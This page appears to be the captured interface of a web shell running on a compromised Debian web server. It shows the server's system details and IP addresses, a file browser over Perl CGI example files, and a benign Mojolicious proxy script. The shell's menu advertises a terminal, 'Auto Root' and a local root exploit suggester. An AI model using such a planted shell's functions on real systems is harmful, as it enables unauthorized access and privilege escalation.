Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.122
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
libcgi-pm-perl /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
clickable_image.cgi
1.4
KB
-rwxr-xr-x
2016-10-29 18:44
cookie.cgi
2.74
KB
-rwxr-xr-x
2016-10-29 18:44
crash.cgi
158
B
-rwxr-xr-x
2016-10-29 18:44
file_upload.cgi
2.39
KB
-rwxr-xr-x
2016-10-29 18:44
mojo_proxy.pl
805
B
-rw-r--r--
2016-10-29 18:44
wikipedia_example.cgi
922
B
-rwxr-xr-x
2016-10-29 18:44
wilogo.gif
458
B
-rw-r--r--
2016-05-23 09:58
Save
Rename
#!/usr/bin/env perl use Mojolicious::Lite; use Mojolicious::Plugin::CGI; my %cgi_scripts = ( '/clickable_image' => "clickable_image.cgi", '/cookie' => "cookie.cgi", '/crash' => "crash.cgi", '/file_upload' => "file_upload.cgi", '/wikipedia_ex' => "wikipedia_example.cgi", ); foreach my $route ( sort keys( %cgi_scripts ) ) { plugin CGI => [ $route => $cgi_scripts{$route} ]; } any '/' => sub { my ( $c ) = @_; $c->stash( { cgi_scripts => { %cgi_scripts } } ); $c->render( 'index' ); }; app->start; __DATA__ @@ index.html.ep <!doctype html><html> <head><title>CGI Examples</title></head> <body> <h3>CGI Examples</h3> % for my $route ( sort keys( %{ $cgi_scripts } ) ) { <a href="<%= $route %>"><%= $cgi_scripts->{$route} %></a><br /> % } </body> </html>